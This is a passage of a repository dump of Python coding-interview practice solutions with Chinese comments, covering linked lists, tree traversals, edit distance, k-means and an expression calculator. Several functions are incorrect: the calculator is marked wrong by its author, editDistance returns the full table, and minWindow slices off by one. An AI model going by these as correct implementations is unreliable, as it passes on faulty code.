"is_vendor": false,
"language": "Python",
"length_bytes": 1404,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 60,
"path": "/根号n.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/22 21:05\n# @Author : Meng Xiao\n'''\n求解根号n,\n'''\n\n# 二分法\ndef mySqrt1(x):\n if x <= 0:\n return 0\n min_F = 0.001\n begin = float(0)\n end = x / 2 + 1\n mid = begin + (end-begin) / 2\n while (end-begin) > min_F:\n if (x-mid*mid) > min_F:\n begin = mid + min_F\n elif (mid*mid-x) > min_F:\n end = mid - min_F\n elif abs(x-mid*mid) < min_F:\n break\n mid = begin + (end-begin) / 2\n print(x-mid*mid)\n return mid\n\n\n\n\n# 梯度下降法\ndef mySqrt2(x):\n if x <= 0:\n return 0\n lr = 0.001 # 学习率\n cur = 1\n for i in range(10000):\n tmp = 4 * cur * (cur*cur-x)\n cur -= lr * tmp\n return cur\n\n\n# 牛顿法\n'''\n x^2 = a的解,也就是函数f(x) = x^2 – a与x轴的交点。\n 可以在x轴上先任选一点x0,则点(x0, f(x0))在f(x)上的切线,\n 与x轴的交点为x1,它们满足切线的方程:f(x0)=(x0-x1)f’(x0),\n 可得x1更接近最终的结果,解方程得到:x1 = (x0 + (a/x0))/2。\n 以x1为新的x0,按照切线的方法依次迭代下去,最终求得符合精确度要求的结果值。\n'''\ndef mySqrt3(x):\n if x <= 0:\n return 0\n res = x\n last_res = 0\n min_F = 0.001\n while abs(res-last_res) > min_F:\n last_res = res\n res = (res+x/res)/2\n return res\nprint(mySqrt1(8))"
},
{
"alpha_fraction": 0.485836923122406,
"alphanum_fraction": 0.501287579536438,
"avg_line_length": 21,
"blob_id": "26d7c6847f23d53a9cf5298926afba34f08e0e24",
"content_id": "6b6d434221c707a8f50e4e02a1e578b5d8165d4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1169,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 53,
"path": "/链表环的入口.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/2 下午4:51\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\nclass Solution:\n def EntryNodeOfLoop(self, pHead):\n meetNode = self.MeetNode(pHead)\n if not meetNode:\n return None\n loop = 1\n flag = meetNode\n while flag.next != meetNode:\n loop += 1\n flag = flag.next\n fast = pHead\n for i in range(loop):\n fast = fast.next\n slow = pHead\n while fast != slow:\n fast = fast.next\n slow = slow.next\n return fast\n\n def MeetNode(self, head):\n if not head:\n return None\n slow = head.next\n if slow == None:\n return None\n fast = slow.next\n while fast:\n if slow == fast:\n return slow\n slow = slow.next\n fast = fast.next.next\n\nx = ListNode(1)\ny = ListNode(2)\nz = ListNode(3)\nf = ListNode(4)\nw = ListNode(5)\nu = ListNode(6)\nx.next = y\ny.next = z\nz.next = f\nf.next = w\nw.next = u\nu.next = z\ns = Solution()\nprint(s.EntryNodeOfLoop(x).val)"
},
{
"alpha_fraction": 0.5411764979362488,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 28.799999237060547,
"blob_id": "8bd7b3b9e981b0a72e6519ab0a5f370bde29c878",
"content_id": "e7a9d2f02e385a9ff2099d50c2fd2ebb513777cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 20,
"path": "/leetcode-124二叉树中最大路径和.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 21:35\n# @Author : Meng Xiao\n\nclass Solution:\n def maxPathSum(self, root: TreeNode) -> int:\n self.global_max = root.val if root else 0\n self.findmax(root)\n return self.global_max\n\n def findmax(self, node):\n if not node:\n return 0\n left = self.findmax(node.left)\n left = left if left > 0 else 0\n right = self.findmax(node.right)\n right = right if right > 0 else 0\n self.global_max = max(node.val + left + right, self.global_max)\n\n return max(left, right) + node.val"
},
{
"alpha_fraction": 0.4938044846057892,
"alphanum_fraction": 0.5057365894317627,
"avg_line_length": 24.045976638793945,
"blob_id": "c5b353ae1d2a4014eea212cb2289a11a23f53ac7",
"content_id": "4672cf73f4f23148eee8ac5b44e70511b35b7e90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2399,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 87,
"path": "/反转链表.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/4 下午3:45\n# @Author : Meng Xiao\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # 就地逆序\n def reversed1(self, pHead):\n if pHead == None or pHead.next == None:\n return pHead\n pre = None # 前驱节点\n cur = None # 当前节点\n next = None # 后继节点\n cur = pHead.next\n next = cur.next\n cur.next = None\n pre = cur\n cur = next\n # 将当前遍历到的节点cur指向其前驱节点\n while cur.next != None:\n next = cur.next\n cur.next = pre\n pre = cur\n cur = next\n # 最后一个节点指向倒数第二个节点\n cur.next = pre\n pHead.next = cur\n return pHead\n\n def reversed2(self, pHead):\n # 插入法 从链表第二个节点开始,把遍历到的节点插入到头结点后面\n if pHead is None or pHead.next is None:\n return pHead\n cur = None # 当前节点\n next = None # 后继节点\n cur = pHead.next.next\n pHead.next.next = None\n while cur is not None:\n next = cur.next\n cur.next = pHead.next\n pHead.next = cur\n cur = next\n return pHead\n\n def reversed3(self, pHead):\n # 递归 不带头结点\n if not pHead or not pHead.next: # 无节点或一个节点 。不需要反转\n return pHead\n else:\n newHead = self.reversed3(pHead.next)\n pHead.next.next = pHead\n pHead.next = None\n return newHead\n\n def printLinkList(self, linklist):\n if linklist == None:\n print('None')\n return\n s = ''\n node = linklist.next\n while node != None:\n s = s + str(node.val)\n node = node.next\n print (s)\n\n def createLinkList(self, linklist_str):\n if len(linklist_str) <= 0:\n return None\n linkList = ListNode(None)\n pNode = linkList\n # 尾插法\n for x in linklist_str:\n node = ListNode(x)\n\n pNode.next = node\n pNode = pNode.next\n return linkList\n\ns = Solution()\nstr1 = '123456'\nlis = s.createLinkList(str1)\nlis1 = s.reversed3(lis)\ns.printLinkList(lis)\ns.printLinkList(lis1)\n"
},
{
"alpha_fraction": 0.43891194462776184,
"alphanum_fraction": 0.458275705575943,
"avg_line_length": 23.636363983154297,
"blob_id": "0507f7e242a952674d5616364d2ebfd4a1ae0276",
"content_id": "066304c17c9b5f53ba8929d6922e3975b4f21158",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2199,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 88,
"path": "/链表的排序(归并、快排).py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/12 10:32\n# @Author : Meng Xiao\n\n'''\n链表的nlogn排序\n'''\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def mergesort(self, head):\n #归并排序\n if head == None or head.next == None:\n return head\n mid = self.findMid(head)\n l1 = head # split\n l2 = mid.next\n mid.next = None\n l1 = self.mergesort(l1)\n l2 = self.mergesort(l2)\n return self.mergeTwoLists(l1, l2)\n\n def mergeTwoLists(self, l1, l2):\n if l1 == None:\n return l2\n if l2 == None:\n return l1\n dummy = ListNode(-1)\n cur = dummy\n while l1 and l2:\n if l1.val < l2.val:\n cur.next = l1\n l1 = l1.next\n else:\n cur.next = l2\n l2 = l2.next\n cur = cur.next\n if l1: # 兜底\n cur.next = l1\n else:\n cur.next = l2\n return dummy.next\n\n def findMid(self, head):\n if head == None or head.next == None:\n return head\n slow = head\n fast = head\n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n\n '''\n 快速排序\n '''\n def quickSort(self, head):\n if head == None or head.next == None:\n return head\n leftH = ListNode(-1)\n resL = leftH\n rightH = ListNode(-1)\n resR = rightH\n pivotNode = head # pivot\n cur = head.next\n while cur != None:\n if cur.val < pivotNode.val:\n leftH.next = cur\n leftH = leftH.next\n else:\n rightH.next = cur\n rightH = rightH.next\n cur = cur.next\n leftH.next = None\n rightH.next = None\n L = self.quickSort(resL.next)\n R = self.quickSort(resR.next)\n pivotNode.next = R\n if L == None:\n return pivotNode\n tmp = L\n while tmp.next != None:\n tmp = tmp.next\n tmp.next = pivotNode\n return L\n\n"
},
{
"alpha_fraction": 0.4542553126811981,
"alphanum_fraction": 0.4936170279979706,
"avg_line_length": 28.40625,
"blob_id": "97552d9e4f2ccb3bf59d37401960d050a6662b97",
"content_id": "fd5013d0c98256ce55db256bc2a38a3a0c7602eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 944,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 32,
"path": "/扑克牌中的顺子.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/18 下午9:31\n# @Author : Meng Xiao\nclass Solution:\n def IsContinuous(self, numbers):\n\n if not numbers or len(numbers) == 0:\n return False\n\n transdict = {'A':1,'J':11,'Q':12,'K':13}\n for i in range(len(numbers)):\n if numbers[i] in transdict.keys():\n numbers[i] = transdict[numbers[i]]\n numbers = sorted(numbers)\n num_0 = 0\n num_gap = 0\n\n i = 0\n while i < len(numbers) and numbers[i] == 0:\n num_0 += 1\n i += 1\n front = num_0\n behind = front + 1\n while behind < len(numbers):\n if numbers[front] == numbers[behind]:\n return False\n num_gap += numbers[behind] - numbers[front] - 1\n front = behind\n behind += 1\n return False if num_gap > num_0 else True\ns = Solution()\nprint(s.IsContinuous([1,3,5,4,0]))"
},
{
"alpha_fraction": 0.49676623940467834,
"alphanum_fraction": 0.5093932747840881,
"avg_line_length": 25.185483932495117,
"blob_id": "f5c5ec2b5f7532007738bbf4d474b0c4dd00d7fb",
"content_id": "ffa881b790a4e60cadfedcfe19f2b035d98be2bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3377,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 124,
"path": "/树的遍历(递归+循环).py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/17 下午3:46\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def inorderTraversal1(self, root):\n if not root:\n return []\n return self.inorderTraversal1(root.left) + [root.val] + self.inorderTraversal1(root.right)\n\n def inorderTraversal2(self, root):\n '''\n 规律:当curnode不为None时,每一次循环将curnode入栈,如果curnode不为None,则出栈一个节点并加入res\n '''\n if not root:\n return []\n stack = []\n res = []\n curnode = root\n while stack or curnode:\n if curnode:\n stack.append(curnode)\n curnode = curnode.left\n else:\n curnode = stack.pop()\n res.append(curnode.val)\n curnode = curnode.right\n return res\n\n def preorderTraversal1(self, root):\n if not root:\n return []\n return [root.val] + self.preorderTraversal1(root.left) + self.preorderTraversal1(root.right)\n\n def preorderTraversal2(self, root):\n if not root:\n return []\n curnode = root\n stack = []\n res = []\n while stack or curnode:\n if curnode:\n res.append(curnode.val)\n stack.append(curnode.right)\n curnode = curnode.left\n else:\n curnode = stack.pop()\n return res\n\n def postorderTraversal1(self, root):\n if not root:\n return []\n return self.postorderTraversal1(root.left) + self.postorderTraversal1(root.right) + [root.val]\n\n def postorderTraversal2(self, root):\n if not root:\n return []\n curnode = root\n stack = []\n res = []\n while stack or curnode:\n if curnode:\n res.append(curnode.val)\n stack.append(curnode.left)\n curnode = curnode.right\n else:\n curnode = stack.pop()\n return res[::-1]\n\n '''\n 层序遍历,也叫宽度优先遍历。\n '''\n def levelorderTraversal1(self, root):\n # 递归学要一个参数level ,表示当前节点的层数。\n def helper(node, level):\n if not node:\n return\n else:\n res[level-1].append(node.val)\n if len(res) == level:\n res.append([])\n helper(node.left, level+1)\n helper(node.right, level+1)\n res = [[]]\n helper(root, 1)\n return res[:-1]\n\n def levelorderTraversal2(self, root):\n if not root:\n return []\n res = []\n curnode = root\n queue = [curnode]\n while queue:\n curnode = queue.pop(0)\n res.append(curnode.val)\n if curnode.left:\n queue.append(curnode.left)\n if curnode.right:\n queue.append(curnode.right)\n return res\n\n\ns = Solution()\na = TreeNode(1)\nb = TreeNode(2)\nc = TreeNode(3)\nd = TreeNode(4)\ne = TreeNode(5)\nf = TreeNode(6)\ng = TreeNode(7)\na.left = b\na.right = c\nb.left = d\nb.right = e\nc.right = f\ne.left = g\n\nprint(s.levelorderTraversal1(a))\nprint(s.levelorderTraversal2(a))\n"
},
{
"alpha_fraction": 0.39109697937965393,
"alphanum_fraction": 0.4356120824813843,
"avg_line_length": 25.16666603088379,
"blob_id": "0db30ef1f6e8692cf1897a6288db1edf7d537bde",
"content_id": "7fdcf9f940048945d415e1281f28e95bb1da820c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 24,
"path": "/剪绳子.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/27 下午9:15\n# @Author : Meng Xiao\nclass Solution:\n def cutRecursion(self, length):\n if length < 2:\n return 0\n if length == 2:\n return 1\n if length == 3:\n return 2\n products = [0, 1, 2, 3]\n\n max = 0\n for i in range(4, length+1):\n products.append(None)\n max = 0\n for j in range(1, i//2+1):\n product = products[j] * products[i-j]\n if max < product:\n max = product\n products[i] = max\n\n return products[length]\n\n"
},
{
"alpha_fraction": 0.36409395933151245,
"alphanum_fraction": 0.42617449164390564,
"avg_line_length": 21.11111068725586,
"blob_id": "ee0e16a725f9b3f727d6d20347344435666c7cf9",
"content_id": "7c1b6de0fe6d1371cda842d1a551b992f385d19c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 646,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/消消乐.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/5 19:57\n# @Author : Meng Xiao\n\n# 消消乐升级,只要有相同连续数字,全部消除,如1,2,3,3,3,2,3,返回1,3\ndef xiaoxiaole(a):\n stack = []\n i = 0\n lena = len(a)\n while(i<lena):\n flag = False\n while(i<lena and len(stack)>0 and stack[-1] == a[i]):\n if i < len(a)-2 and a[i+1] != a[i+2]:\n i += 1\n flag = True\n if(flag):\n stack.pop()\n else:\n stack.append(a[i])\n i += 1\n\n return stack\n\nif __name__ == \"__main__\":\n a = [1,4,2,2,3,3,2,4,1]\n s = xiaoxiaole(a)\n print(s)"
},
{
"alpha_fraction": 0.37228259444236755,
"alphanum_fraction": 0.43885868787765503,
"avg_line_length": 26.296297073364258,
"blob_id": "2a8c4697b858e1a3d608919d4c6bee119fc8132f",
"content_id": "c730d49b74f12042423ac438d1bb2aefca15dd35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 794,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 27,
"path": "/编辑距离.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/4 上午10:16\n# @Author : Meng Xiao\n'''\n动态规划思想:dp[i][j]表示将字符串A[0:i-1]转变为B[0:j-1]的最小步骤数\n'''\n\nclass Solution:\n def editDistance(self, str1, str2):\n n1, n2 = len(str1), len(str2)\n if n1 == 0:\n return n2\n if n2 == 0:\n return n1\n edit = [[i + j for j in range(n2 + 1)] for i in range(n1 + 1)] # 初始化边界\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n if str1[i-1] == str2[j-1]:\n d = 0\n else:\n d = 1\n edit[i][j] = min(edit[i-1][j]+1, edit[i][j-1]+1, edit[i-1][j-1]+d)\n return edit#\n\ns = Solution()\nprint(s.editDistance('abcf', 'abde'))"
},
{
"alpha_fraction": 0.5006648898124695,
"alphanum_fraction": 0.5272606611251831,
"avg_line_length": 25.36842155456543,
"blob_id": "1dcc523d6fe9606f2ca21b5ce79faefb11215efc",
"content_id": "224c6a1887ac46dd3f763e99c8e275cbe6a45389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1860,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 57,
"path": "/kmeans.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/9/14 16:36\n# @Author : Meng Xiao\n'''\n算法原理\n(1) 初始随机选取k个中心点;\n(2) 遍历每个样本,选取距离每个样本最近的中心点,归为该类;\n(3) 更新中心点为每类的均值;\n(4) 重复(2)(3)迭代更新,直至误差小到某个值或者到达一定的迭代步数.\n'''\nimport numpy as np\nimport math\ndef kmeans(k):\n m, n = 100, 20 # 构造样本, 100行, 20列\n x = 10 * np.random.random((m, n))\n # 随机选取k个初始中心点\n init_cent_sample = set()\n while len(init_cent_sample) < k:\n init_cent_sample.add(np.random.randint(0, m))\n cent = x[list(init_cent_sample)]\n\n # 记录每个样本的类归属\n cluster_assessment = np.zeros((m, 2)) # [类, 距离]\n\n # 记录每个类的中心点在本次迭代后是否有过改变\n cent_changed = True\n while cent_changed:\n cent_changed = False\n\n for j in range(m):\n min_idx = -1 # 记录每个样本距离最近的类\n min_dist = math.inf # 记录每个样本的最小类距离\n\n for i in range(k):\n d = distance(x[j], cent[i])\n if d < min_dist:\n min_dist = d\n min_idx = i\n\n # 记录是否发生变化\n if min_idx != cluster_assessment[j][0]:\n cluster_assessment[j] = np.array([min_idx, min_dist])\n cent_changed = True\n print(cluster_assessment)\n\n # 更新每个类的中心点:均值\n for i in range(k):\n cent_i_samples = np.where(cluster_assessment[:, 0] == i)\n if len(cent_i_samples) > 0:\n print(cent_i_samples)\n cent[i] = np.mean(x[cent_i_samples], axis=0)\n\n\ndef distance(a, b):\n return math.sqrt(sum(pow(a-b, 2)))\n\nkmeans(10)\n\n"
},
{
"alpha_fraction": 0.3321078419685364,
"alphanum_fraction": 0.3700980246067047,
"avg_line_length": 31.639999389648438,
"blob_id": "a0c0d8b2c8e761c61e75b6afab1dd370793d603e",
"content_id": "e45eefe6709a1811538e7d3c76844bc3f0511399",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 25,
"path": "/leetcode-394 字符串解码.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 下午2:31\n# @Author : Meng Xiao\nclass Solution:\n def decodeString(self, s):\n s = list(s)\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n stack = []\n while s:\n char = s.pop(0)\n if char != ']':\n stack.append(char)\n else:\n op1, op2 = '', ''\n popchar = stack.pop()\n while popchar != '[':\n op2 = popchar + op2\n popchar = stack.pop()\n while stack and stack[-1] in nums:\n popchar = stack.pop()\n op1 = popchar + op1\n res = int(op1) * op2\n for char in res:\n stack.append(char)\n return ''.join(stack)\n"
},
{
"alpha_fraction": 0.3744588792324066,
"alphanum_fraction": 0.4015151560306549,
"avg_line_length": 30.86206817626953,
"blob_id": "487e3570e9b535e29fa1f4105bab818bb9482d78",
"content_id": "c42efa4cf87711e9b2c44143678786c8171e6899",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 29,
"path": "/leetcode-76最小覆盖子串.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 上午12:23\n# @Author : Meng Xiao\nimport collections\nclass Solution:\n def minWindow(self, s, t):\n if len(s) < len(t):\n return ''\n maps = collections.Counter(t)\n counter = len(maps)\n begin, end, head, length = 0, 0, 0, float('inf')\n while end < len(s):\n if s[end] in maps:\n maps[s[end]] -= 1\n if maps[s[end]] == 0:\n counter -= 1\n end += 1\n while counter == 0:\n if s[begin] in maps:\n maps[s[begin]] += 1\n if maps[s[begin]] > 0:\n counter += 1\n if end - begin < length:\n length = end - begin\n head = begin\n begin += 1\n if length == float('inf'):\n return ''\n return s[head:head+length-1]\n"
},
{
"alpha_fraction": 0.3855421543121338,
"alphanum_fraction": 0.4192771017551422,
"avg_line_length": 23.41176414489746,
"blob_id": "3c08a87b2ac10991e8f21160c434709b9fe36828",
"content_id": "081d8ff38b3dbe7dcb1999ca2110dd36631f2ca6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 419,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 17,
"path": "/第一个只出现一次的字符.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午4:02\n# @Author : Meng Xiao\nclass Solution:\n def FirstNotRepeatingChar(self, s):\n if not s:\n return\n store = {}\n lis = list(s)\n for i in lis:\n if i not in store.keys():\n store[i] = 0\n store[i] += 1\n for i in lis:\n if store[i] == 1:\n return i\n return\n"
},
{
"alpha_fraction": 0.3324607312679291,
"alphanum_fraction": 0.3656195402145386,
"avg_line_length": 23.404254913330078,
"blob_id": "2d912436c8fe3de50ef98825f59585e2e6d7d17d",
"content_id": "bb2702463c9c41384f59bde966ec7bd4f70cc0d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1178,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 47,
"path": "/leetcode-224计算器.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/31 17:13\n# @Author : Meng Xiao\n\n# 计算单独的表达式\ndef eval_(S):\n opt_set1 = ('*', '/')\n opt_set2 = ('+', '-')\n st = [S[0]]\n for i in range(1, len(S)):\n if S[i-1] not in opt_set1:\n st.append(S[i])\n else:\n st.pop()\n if S[i-1] == '*':\n d = int(st.pop()) * int(S[i])\n else:\n d = int(st.pop()) / int(S[i])\n st.append(str(int(d)))\n if len(st) == 1:\n return int(st[0])\n res = 0\n for i in range(1, len(st)):\n if st[i-1] not in opt_set2:\n continue\n if st[i-1] == '+': # 这里不对\n res += int(st[i-2]) + int(st[i])\n else:\n res += int(st[i-2]) - int(st[i])\n return res\n\ndef cal(S): # 先去括号\n st = []\n for s in S:\n if s != ')':\n st.append(s)\n else:\n temp = ''\n tmp = st.pop()\n while tmp != '(':\n temp += tmp\n tmp = st.pop()\n st.append(str(eval_(temp)))\n\n return eval_(''.join(st))\n\nprint(cal(\"(3-(5-(8)-(2+(9-(0-(8-(2))))-(4))-(4)))\"))"
},
{
"alpha_fraction": 0.3776662349700928,
"alphanum_fraction": 0.44667503237724304,
"avg_line_length": 25.566667556762695,
"blob_id": "8145b8a1b9093c468c9329de65d055864f942e46",
"content_id": "37db5242d85f50cddee9da0a7ea44b6aa50d1191",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 801,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 30,
"path": "/两个链表第一个公共节点.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/16 下午7:23\n# @Author : Meng Xiao\nclass Solution:\n def FindFirstCommonNode(self, pHead1, pHead2):\n if not pHead1 or not pHead2:\n return None\n p1, p2 = pHead1, pHead2\n len1 = len2 = 0\n while p1:\n len1 += 1\n p1 = p1.next\n while p2:\n len2 += 1\n p2 = p2.next\n if len1 > len2:\n while len1 - len2:\n pHead1 = pHead1.next\n len1 -= 1\n else:\n while len2 - len1:\n pHead2 = pHead2.next\n len2 -= 1\n while pHead1 and pHead2:\n if pHead1 is pHead2:\n return pHead1\n pHead2 = pHead2.next\n pHead1 = pHead1.next\n\n return None\n"
},
{
"alpha_fraction": 0.4934611916542053,
"alphanum_fraction": 0.5187445282936096,
"avg_line_length": 30.83333396911621,
"blob_id": "cdc116861b76360f0aa0143186fc1900e8f270cb",
"content_id": "0b4833ed7df8fc073a9089a7114a47098f89c256",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1223,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 36,
"path": "/顺时针打印矩阵.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/4/9 下午4:11\n# @Author : Meng Xiao\nclass Solution:\n\n def printMatrix(self, matrix):\n if not matrix:\n return []\n rows = len(matrix)\n columns = len(matrix[0])\n start = 0\n result = []\n while columns > start*2 and rows > start*2:\n self.printMatrixInCircle(matrix, columns, rows, start, result)\n start += 1\n return result\n\n def printMatrixInCircle(self, matrix, columns, rows, start, result):\n endX = columns - 1 - start\n endY = rows - 1 - start\n # 左至右打印一行\n for i in range(start, endX+1):\n result.append(matrix[start][i])\n\n # 从上到下打印1列\n if start < endY:\n for i in range(start+1, endY+1):\n result.append(matrix[i][endX])\n # 从右往左打印一行\n if start < endX and start < endY:\n for i in range(endX-1, start-1, -1):\n result.append(matrix[endY][i])\n #从下到上打印1列 (至少需要3行两列)\n if start < endX and start + 1 < endY:\n for i in range(endY-1, start, -1):\n result.append(matrix[i][start])\n\n"
},
{
"alpha_fraction": 0.45306387543678284,
"alphanum_fraction": 0.46544981002807617,
"avg_line_length": 25.44827651977539,
"blob_id": "921830ae0f6f50b007289fff444809ec3f4a849f",
"content_id": "39b03089649f1548cd094312a50c744850b6dce0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1732,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 58,
"path": "/二叉排序树插入 删除.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/8/17 19:03\n# @Author : Meng Xiao\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nclass Solution:\n def InsertBST(self, t, key):\n if not t:\n t = TreeNode(key)\n return t\n if key < t.val:\n t.left = self.InsertBST(t.left, key)\n else:\n t.right = self.InsertBST(t.right, key)\n return t\n\n def DeleteBST(self, root, key):\n\n def findmin(root): # 找到二叉排序树中最小的节点, 即为最左边的节点\n while root.left:\n root = root.left\n return root\n if not root:\n return\n elif key < root.val:\n root.left = self.DeleteBST(root.left, key)\n elif key > root.val:\n root.right = self.DeleteBST(root.right, key)\n \n '''\n 如果x没有子节点,或者只有一个孩子,直接将x“切下”;\n 否则,x有两个孩子,我们用其右子树中的最小值替换掉x,\n 然后将右子树中的这一最小值递归的“切掉”。 \n '''\n else: # root为要删除节点\n if root.left and root.right:\n tmp = findmin(root.right)\n root.val = tmp.val\n root.right = self.DeleteBST(root.right, tmp.val)\n else:\n if not root.left:\n root = root.right\n elif not root.right:\n root = root.left\n return root\n \n \n \n\n\ns = Solution()\nt = TreeNode(5)\narr = [5,2,7,1,4]\nfor x in arr[1:]:\n t = s.InsertBST(t, x)\n"
},
{
"alpha_fraction": 0.4482323229312897,
"alphanum_fraction": 0.4747474789619446,
"avg_line_length": 20.432432174682617,
"blob_id": "c6ed1485c28b97919c9945191d17569ac9363d75",
"content_id": "ca2a07b09e9badc706517aa88d2dda1b734752b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 37,
"path": "/1.数组中重复数字.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# @Time : 2019/3/18 下午3:33\n# @Author : Meng Xiao\n# @File : 1.数组中重复数字.py\n# @Software: PyCharm\ndef swap(i, j, a):\n tmp = a[i]\n a[i] = a[j]\n a[j] = tmp\n return a\ndef repeat_1(list):\n for i in range(len(list)):\n if list[i] != i:\n if list[i] == list[list[i]]:\n return list[i], True\n else:\n swap(list[i], list[list[i]], list)\n else:\n continue\n\n return False\n# 以上为第一种方法\n\n# 方法2 用哈希\ndef repeat_2(list):\n dict1 = dict()\n for i in list:\n if i not in dict1:\n dict1[i] = 1\n else:\n return i, True\n return False\n\nif __name__ == '__main__':\n a = list(map(int, input('请依次输入数组元素\\n').split()))\n #print(repeat_1(a))\n print(repeat_2(a))"
},
{
"alpha_fraction": 0.48901546001434326,
"alphanum_fraction": 0.5134255290031433,
"avg_line_length": 27.581396102905273,
"blob_id": "81d3a0ba8eef4b142fae3e95dbea83eec0b6bc78",
"content_id": "f1abad344686ce01779c7add38f82660e0fe8f82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1233,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 43,
"path": "/数据流中的中位数.py",
"repo_name": "melo4/jianzhioffer",
"src_encoding": "UTF-8",
